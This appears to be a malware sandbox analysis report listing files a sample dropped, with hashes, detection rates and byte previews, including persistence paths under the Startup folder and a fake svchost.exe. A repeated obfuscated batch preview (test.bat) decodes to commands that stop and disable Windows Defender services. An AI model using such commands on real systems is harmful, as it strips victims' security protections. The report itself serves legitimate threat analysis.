                                                                                                  Preview: @...e...........;.......h.............X...G..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementP................./.C..J..%...].......%.Microsoft.PowerShell.Com
                                                                                                  C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe
                                                                                                  Process:C:\Program Files\Common Files\system\E59A6148\svchost.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):91000
                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:unknown
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat
                                                                                                  Process:C:\Program Files\Common Files\system\E59A6148\svchost.exe
                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8399
                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                  C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe
                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):91000
                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:unknown
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat
                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8399
                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                  C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe
                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):91000
                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:unknown
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat
                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8399
                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                  C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe
                                                                                                  Process:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):91000
                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:unknown
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat
                                                                                                  Process:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8399
                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sujccj5.2hr.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0to0l3af.5lh.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wq03asq.lvp.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fxzhyif.zrp.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52yaov0d.0wm.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3fzrzyw.hii.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_av5ukidk.5ll.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayrbxg4e.dwv.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cucfolck.ogk.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dahb04fl.vus.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2lf1ctc.q2f.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffdfjlzo.kti.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
